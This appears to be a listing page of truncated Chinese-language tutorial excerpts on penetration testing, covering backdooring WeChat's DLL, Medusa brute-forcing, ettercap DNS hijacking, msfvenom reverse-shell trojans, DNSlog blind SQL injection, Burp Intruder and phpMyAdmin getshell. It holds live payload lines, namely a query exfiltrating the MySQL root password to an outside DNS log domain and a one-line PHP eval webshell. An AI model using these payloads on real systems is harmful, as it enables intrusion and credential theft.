该文章仅供学习,利用方法来自网络文章,仅供参考 the-backdoor-factory-master(后门工制造厂)原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload. 测试靶机环境,win7系统,wechat(微信)2.6.8 靶机ip:192.168.190.129 目标:利用the-backdoor-factory-master对微信自己的dll动态连接文件植入后门,等微信运行之后,反弹…
Medusa(美杜莎)暴力破解使用 该文章仅供学习,利用方法来自网络文章,仅供参考 一.简介 medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是,medusa的稳定性相较于hydra要好很多但是支持的模块相对于hydra少一些. 二,语法参数 medusha [-h host主机 或 -H file主机文件] [-u username 用户名 或 -U file用户名字典…
sunny.exe clientid 隧道ID route -n 查看网关netstat -rn 查看网关 DNS劫持ettercap用来内网渗透测试使用,可以嗅探内网,DNS劫持等攻击1,在攻击者电脑上,搭建web服务器2,终端打开ettercap的DNS文件,/etc/ettercap/etter.dns,在其中添加欺骗的A记录和PTR记录3,输入ettercap -G打开ettercap工具图形化界面4,开始主机扫描,在sniff选项下,选择 unified sniffing,选择需要嗅探…
使用kali下metasploit生成木马,控制windows系统 kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack) Metasploit,是综合利用工具,使用Ruby开发,使用方便 msfconsole进入工具 MSF,依赖postgresql数据库,在使用MSF前要开启数据库 msfvenom:生成木马msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5…
sqlmap参数--file-read,从数据库服务器中读取文件--file-write,--file-dest,把文件上传到数据库服务器中 dnslog平台的学习和它在盲注中的应用1,判断注入点2,测试网站对DNSlog提供的url是否解析SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'))…
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具.Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程.所有工具都共享一个请求,并能处理对应的HTTP 消息.持久性.认证.代理.日志.警报. 使用靶机DVWA里的爆破关进行学习,DVWA难度设置为low 1,Sniper(狙击手) 该模式就是添加一个参数,加载响应的pyload之后一个个进行尝试爆破,如果添加了两个参数,那么就会在第一个参数使用字典爆破结束之后,对第二个参数进行一个个爆破 设置好代理之后…
windows系统基础命令学习 1,命令提示符界面进入方法 方法一: 某分区按住shift,右键单击选择在此处打开windows powershell,进入之后输入cmd 方法二:标题栏输入 方法三:win+r输入cmd 2,windows系统管理和文件管理常用命令 systeminfo 获取系统信息 > :用来重定向输入 path: 显示环境变量 set:显示系统变量 whoami:显示当前用户 hostname:显示当前计算机名称 mkdir “文件夹名称”:创建新文件夹 rmdir “文件…
Burp suite功能模块Dashboard:扫描Proxy:拦截包,代理 drop:放弃Intruder:爆破Decoder:编码,解码repeater:重放comparer:比较 BP,proxy项目,拦截响应包,BP要勾选intercept responses based on the following rules:intercept client requests,拦截请求intercept clent responses,拦截响应 HHTP协议基础HTTP特点简单快捷,请求方式ge…
一.搭建WordPress的cms网站管理系统 1,下载Wordpress cms源码,下载地址:https://wordpress.org/download/ 2,将源码解压到phpstudy目录下的WWW文件夹下 3,启动phpstudy的apache服务和mysql服务 4,打开打开phpmyadmin,进入Mysql数据库管理界面,点击数据库,创建名为wordpress的数据库 5,打开浏览器,访问127.0.0.1/wordpress,进入到wordpress的安装界面,首先选择语言,…
phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-priv没设置为空或指定的文件夹可以利用,写入木马,select"<?php @eval($_POST[s]);?>" into outfile "var/www/html/xx.php" 利用日志文件getshell,mysql大于5.0版本会创建日志文件,…